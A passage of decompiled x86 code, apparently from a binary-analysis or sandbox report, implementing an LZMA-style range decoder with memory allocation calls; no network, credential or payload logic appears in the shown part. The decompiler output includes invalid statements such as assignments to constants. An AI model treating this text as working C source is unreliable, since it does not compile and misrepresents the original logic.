                                                          							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                          						}
                                                          						if( *(_t614 - 0x10) >= 0x1000000) {
                                                          							L139:
                                                          							_t533 =  *(_t614 - 0x84);
                                                          							L140:
                                                          							 *(_t614 - 0x88) = _t533;
                                                          							goto L1;
                                                          						} else {
                                                          							L137:
                                                          							if( *(_t614 - 0x6c) == 0) {
                                                          								 *(_t614 - 0x88) = 5;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                          							goto L139;
                                                          						}
                                                          					} else {
                                                          						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          						__esi =  *(__ebp - 0x60);
                                                          						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          						__ecx =  *(__ebp - 0x3c);
                                                          						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          						__ecx =  *(__ebp - 4);
                                                          						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          						if( *(__ebp - 0x38) >= 4) {
                                                          							if( *(__ebp - 0x38) >= 0xa) {
                                                          								_t97 = __ebp - 0x38;
                                                          								 *_t97 =  *(__ebp - 0x38) - 6;
                                                          							} else {
                                                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          							}
                                                          						} else {
                                                          							 *(__ebp - 0x38) = 0;
                                                          						}
                                                          						if( *(__ebp - 0x34) == __edx) {
                                                          							__ebx = 0;
                                                          							__ebx = 1;
                                                          							L60:
                                                          							__eax =  *(__ebp - 0x58);
                                                          							__edx = __ebx + __ebx;
                                                          							__ecx =  *(__ebp - 0x10);
                                                          							__esi = __edx + __eax;
                                                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          							__ax =  *__esi;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								_t216 = __edx + 1; // 0x1
                                                          								__ebx = _t216;
                                                          								__cx = __ax >> 5;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								L59:
                                                          								if(__ebx >= 0x100) {
                                                          									goto L54;
                                                          								}
                                                          								goto L60;
                                                          							} else {
                                                          								L57:
                                                          								if( *(__ebp - 0x6c) == 0) {
                                                          									 *(__ebp - 0x88) = 0xf;
                                                          									goto L170;
                                                          								}
                                                          								__ecx =  *(__ebp - 0x70);
                                                          								__eax =  *(__ebp - 0xc);
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								_t202 = __ebp - 0x70;
                                                          								 *_t202 =  *(__ebp - 0x70) + 1;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								goto L59;
                                                          							}
                                                          						} else {
                                                          							__eax =  *(__ebp - 0x14);
                                                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          							if(__eax >=  *(__ebp - 0x74)) {
                                                          								__eax = __eax +  *(__ebp - 0x74);
                                                          							}
                                                          							__ecx =  *(__ebp - 8);
                                                          							__ebx = 0;
                                                          							__ebx = 1;
                                                          							__al =  *((intOrPtr*)(__eax + __ecx));
                                                          							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          							L40:
                                                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          							 *(__ebp - 0x48) = __eax;
                                                          							__eax = __eax + 1;
                                                          							__eax = __eax << 8;
                                                          							__eax = __eax + __ebx;
                                                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          							__ax =  *__esi;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__edx = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								 *(__ebp - 0x40) = 1;
                                                          								__cx = __ax >> 5;
                                                          								__ebx = __ebx + __ebx + 1;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edx;
                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								L38:
                                                          								__eax =  *(__ebp - 0x40);
                                                          								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          									while(1) {
                                                          										if(__ebx >= 0x100) {
                                                          											break;
                                                          										}
                                                          										__eax =  *(__ebp - 0x58);
                                                          										__edx = __ebx + __ebx;
                                                          										__ecx =  *(__ebp - 0x10);
                                                          										__esi = __edx + __eax;
                                                          										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          										__ax =  *__esi;
                                                          										 *(__ebp - 0x54) = __esi;
                                                          										__edi = __ax & 0x0000ffff;
                                                          										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          										if( *(__ebp - 0xc) >= __ecx) {
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          											__cx = __ax;
                                                          											_t169 = __edx + 1; // 0x1
                                                          											__ebx = _t169;
                                                          											__cx = __ax >> 5;
                                                          											 *__esi = __ax;
                                                          										} else {
                                                          											 *(__ebp - 0x10) = __ecx;
                                                          											0x800 = 0x800 - __edi;
                                                          											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          											__ebx = __ebx + __ebx;
                                                          											 *__esi = __cx;
                                                          										}
                                                          										 *(__ebp - 0x44) = __ebx;
                                                          										if( *(__ebp - 0x10) < 0x1000000) {
                                                          											L45:
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xe;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t155 = __ebp - 0x70;
                                                          											 *_t155 =  *(__ebp - 0x70) + 1;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          										}
                                                          									}
                                                          									L53:
                                                          									_t172 = __ebp - 0x34;
                                                          									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                          									L54:
                                                          									__al =  *(__ebp - 0x44);
                                                          									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          									L55:
                                                          									if( *(__ebp - 0x64) == 0) {
                                                          										 *(__ebp - 0x88) = 0x1a;
                                                          										goto L170;
                                                          									}
                                                          									__ecx =  *(__ebp - 0x68);
                                                          									__al =  *(__ebp - 0x5c);
                                                          									__edx =  *(__ebp - 8);
                                                          									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          									 *( *(__ebp - 0x68)) = __al;
                                                          									__ecx =  *(__ebp - 0x14);
                                                          									 *(__ecx +  *(__ebp - 8)) = __al;
                                                          									__eax = __ecx + 1;
                                                          									__edx = 0;
                                                          									_t191 = __eax %  *(__ebp - 0x74);
                                                          									__eax = __eax /  *(__ebp - 0x74);
                                                          									__edx = _t191;
                                                          									L79:
                                                          									 *(__ebp - 0x14) = __edx;
                                                          									L80:
                                                          									 *(__ebp - 0x88) = 2;
                                                          									goto L1;
                                                          								}
                                                          								if(__ebx >= 0x100) {
                                                          									goto L53;
                                                          								}
                                                          								goto L40;
                                                          							} else {
                                                          								L36:
                                                          								if( *(__ebp - 0x6c) == 0) {
                                                          									 *(__ebp - 0x88) = 0xd;
                                                          									L170:
                                                          									_t568 = 0x22;
                                                          									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                          									_t535 = 0;
                                                          									L172:
                                                          									return _t535;
                                                          								}
                                                          								__ecx =  *(__ebp - 0x70);
                                                          								__eax =  *(__ebp - 0xc);
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								_t121 = __ebp - 0x70;
                                                          								 *_t121 =  *(__ebp - 0x70) + 1;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								goto L38;
                                                          							}
                                                          						}
                                                          					}
                                                          					L1:
                                                          					_t534 =  *(_t614 - 0x88);
                                                          					if(_t534 > 0x1c) {
                                                          						L171:
                                                          						_t535 = _t534 | 0xffffffff;
                                                          						goto L172;
                                                          					}
                                                          					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                          						case 0:
                                                          							if( *(_t614 - 0x6c) == 0) {
                                                          								goto L170;
                                                          							}
                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                          							_t534 =  *( *(_t614 - 0x70));
                                                          							if(_t534 > 0xe1) {
                                                          								goto L171;
                                                          							}
                                                          							_t538 = _t534 & 0x000000ff;
                                                          							_push(0x2d);
                                                          							asm("cdq");
                                                          							_pop(_t570);
                                                          							_push(9);
                                                          							_pop(_t571);
                                                          							_t610 = _t538 / _t570;
                                                          							_t540 = _t538 % _t570 & 0x000000ff;
                                                          							asm("cdq");
                                                          							_t605 = _t540 % _t571 & 0x000000ff;
                                                          							 *(_t614 - 0x3c) = _t605;
                                                          							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                          							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                          							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                          							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                          								L10:
                                                          								if(_t613 == 0) {
                                                          									L12:
                                                          									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                          									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                          									goto L15;
                                                          								} else {
                                                          									goto L11;
                                                          								}
                                                          								do {
                                                          									L11:
                                                          									_t613 = _t613 - 1;
                                                          									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                          								} while (_t613 != 0);
                                                          								goto L12;
                                                          							}
                                                          							if( *(_t614 - 4) != 0) {
                                                          								GlobalFree( *(_t614 - 4));
                                                          							}
                                                          							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                          							 *(_t614 - 4) = _t534;
                                                          							if(_t534 == 0) {
                                                          								goto L171;
                                                          							} else {
                                                          								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                          								goto L10;
                                                          							}
                                                          						case 1:
                                                          							L13:
                                                          							__eflags =  *(_t614 - 0x6c);
                                                          							if( *(_t614 - 0x6c) == 0) {
                                                          								 *(_t614 - 0x88) = 1;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                          							_t45 = _t614 - 0x48;
                                                          							 *_t45 =  *(_t614 - 0x48) + 1;
                                                          							__eflags =  *_t45;
                                                          							L15:
                                                          							if( *(_t614 - 0x48) < 4) {
                                                          								goto L13;
                                                          							}
                                                          							_t546 =  *(_t614 - 0x40);
                                                          							if(_t546 ==  *(_t614 - 0x74)) {
                                                          								L20:
                                                          								 *(_t614 - 0x48) = 5;
                                                          								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                          								goto L23;
                                                          							}
                                                          							 *(_t614 - 0x74) = _t546;
                                                          							if( *(_t614 - 8) != 0) {
                                                          								GlobalFree( *(_t614 - 8));
                                                          							}
                                                          							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                          							 *(_t614 - 8) = _t534;
                                                          							if(_t534 == 0) {
                                                          								goto L171;
                                                          							} else {
                                                          								goto L20;
                                                          							}
                                                          						case 2:
                                                          							L24:
                                                          							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                          							 *(_t614 - 0x84) = 6;
                                                          							 *(_t614 - 0x4c) = _t553;
                                                          							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                          							goto L132;
                                                          						case 3:
                                                          							L21:
                                                          							__eflags =  *(_t614 - 0x6c);
                                                          							if( *(_t614 - 0x6c) == 0) {
                                                          								 *(_t614 - 0x88) = 3;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                          							_t67 = _t614 - 0x70;
                                                          							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                          							__eflags =  *_t67;
                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                          							L23:
                                                          							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                          							if( *(_t614 - 0x48) != 0) {
                                                          								goto L21;
                                                          							}
                                                          							goto L24;
                                                          						case 4:
                                                          							goto L133;
                                                          						case 5:
                                                          							goto L137;
                                                          						case 6:
                                                          							goto L0;
                                                          						case 7:
                                                          							__eflags =  *(__ebp - 0x40) - 1;
                                                          							if( *(__ebp - 0x40) != 1) {
                                                          								__eax =  *(__ebp - 0x24);
                                                          								 *(__ebp - 0x80) = 0x16;
                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          								__eax =  *(__ebp - 0x28);
                                                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          								__eax =  *(__ebp - 0x2c);
                                                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          								__eax = 0;
                                                          								__eflags =  *(__ebp - 0x38) - 7;
                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          								__al = __al & 0x000000fd;
                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          								__eax =  *(__ebp - 4);
                                                          								__eax =  *(__ebp - 4) + 0x664;
                                                          								__eflags = __eax;
                                                          								 *(__ebp - 0x58) = __eax;
                                                          								goto L68;
                                                          							}
                                                          							__eax =  *(__ebp - 4);
                                                          							__ecx =  *(__ebp - 0x38);
                                                          							 *(__ebp - 0x84) = 8;
                                                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          							goto L132;
                                                          						case 8:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x84) = 0xa;
                                                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x38);
                                                          								__ecx =  *(__ebp - 4);
                                                          								__eax =  *(__ebp - 0x38) + 0xf;
                                                          								 *(__ebp - 0x84) = 9;
                                                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          							}
                                                          							goto L132;
                                                          						case 9:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								goto L89;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x60);
                                                          							if( *(__ebp - 0x60) == 0) {
                                                          								goto L171;
                                                          							}
                                                          							__eax = 0;
                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                          							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                          							__eflags = _t258;
                                                          							0 | _t258 = _t258 + _t258 + 9;
                                                          							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                          							goto L75;
                                                          						case 0xa:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x84) = 0xb;
                                                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x28);
                                                          							goto L88;
                                                          						case 0xb:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__ecx =  *(__ebp - 0x24);
                                                          								__eax =  *(__ebp - 0x20);
                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x24);
                                                          							}
                                                          							__ecx =  *(__ebp - 0x28);
                                                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          							L88:
                                                          							__ecx =  *(__ebp - 0x2c);
                                                          							 *(__ebp - 0x2c) = __eax;
                                                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          							L89:
                                                          							__eax =  *(__ebp - 4);
                                                          							 *(__ebp - 0x80) = 0x15;
                                                          							__eax =  *(__ebp - 4) + 0xa68;
                                                          							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          							goto L68;
                                                          						case 0xc:
                                                          							L99:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xc;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t334 = __ebp - 0x70;
                                                          							 *_t334 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t334;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							__eax =  *(__ebp - 0x2c);
                                                          							goto L101;
                                                          						case 0xd:
                                                          							goto L36;
                                                          						case 0xe:
                                                          							goto L45;
                                                          						case 0xf:
                                                          							goto L57;
                                                          						case 0x10:
                                                          							L109:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0x10;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t365 = __ebp - 0x70;
                                                          							 *_t365 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t365;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							goto L111;
                                                          						case 0x11:
                                                          							L68:
                                                          							__esi =  *(__ebp - 0x58);
                                                          							 *(__ebp - 0x84) = 0x12;
                                                          							goto L132;
                                                          						case 0x12:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 0x58);
                                                          								 *(__ebp - 0x84) = 0x13;
                                                          								__esi =  *(__ebp - 0x58) + 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x4c);
                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                          							__eflags = __eax;
                                                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          							goto L130;
                                                          						case 0x13:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								_t469 = __ebp - 0x58;
                                                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          								__eflags =  *_t469;
                                                          								 *(__ebp - 0x30) = 0x10;
                                                          								 *(__ebp - 0x40) = 8;
                                                          								L144:
                                                          								 *(__ebp - 0x7c) = 0x14;
                                                          								goto L145;
                                                          							}
                                                          							__eax =  *(__ebp - 0x4c);
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                          							 *(__ebp - 0x30) = 8;
                                                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          							L130:
                                                          							 *(__ebp - 0x58) = __eax;
                                                          							 *(__ebp - 0x40) = 3;
                                                          							goto L144;
                                                          						case 0x14:
                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          							__eax =  *(__ebp - 0x80);
                                                          							goto L140;
                                                          						case 0x15:
                                                          							__eax = 0;
                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          							__al = __al & 0x000000fd;
                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          							goto L120;
                                                          						case 0x16:
                                                          							__eax =  *(__ebp - 0x30);
                                                          							__eflags = __eax - 4;
                                                          							if(__eax >= 4) {
                                                          								_push(3);
                                                          								_pop(__eax);
                                                          							}
                                                          							__ecx =  *(__ebp - 4);
                                                          							 *(__ebp - 0x40) = 6;
                                                          							__eax = __eax << 7;
                                                          							 *(__ebp - 0x7c) = 0x19;
                                                          							 *(__ebp - 0x58) = __eax;
                                                          							goto L145;
                                                          						case 0x17:
                                                          							L145:
                                                          							__eax =  *(__ebp - 0x40);
                                                          							 *(__ebp - 0x50) = 1;
                                                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          							goto L149;
                                                          						case 0x18:
                                                          							L146:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0x18;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t484 = __ebp - 0x70;
                                                          							 *_t484 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t484;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							L148:
                                                          							_t487 = __ebp - 0x48;
                                                          							 *_t487 =  *(__ebp - 0x48) - 1;
                                                          							__eflags =  *_t487;
                                                          							L149:
                                                          							__eflags =  *(__ebp - 0x48);
                                                          							if( *(__ebp - 0x48) <= 0) {
                                                          								__ecx =  *(__ebp - 0x40);
                                                          								__ebx =  *(__ebp - 0x50);
                                                          								0 = 1;
                                                          								__eax = 1 << __cl;
                                                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          								__eax =  *(__ebp - 0x7c);
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								goto L140;
                                                          							}
                                                          							__eax =  *(__ebp - 0x50);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          							__eax =  *(__ebp - 0x58);
                                                          							__esi = __edx + __eax;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__ax =  *__esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								__cx = __ax >> 5;
                                                          								__eax = __eax - __ecx;
                                                          								__edx = __edx + 1;
                                                          								__eflags = __edx;
                                                          								 *__esi = __ax;
                                                          								 *(__ebp - 0x50) = __edx;
                                                          							} else {
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								goto L148;
                                                          							} else {
                                                          								goto L146;
                                                          							}
                                                          						case 0x19:
                                                          							__eflags = __ebx - 4;
                                                          							if(__ebx < 4) {
